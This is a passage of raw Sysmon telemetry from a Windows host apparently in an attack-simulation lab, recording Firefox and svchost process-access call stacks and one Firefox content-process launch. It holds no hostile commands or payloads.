Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.043{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a 10341000x800000000000000016859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.043{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.043{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.037{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.037{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.037{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.20.1983361949\806575280" -childID 3 -isForBrowser -prefsHandle 3744 -prefMapHandle 3720 -prefsLen 2089 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 3752 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.037{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.880{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.770{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a80098|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program 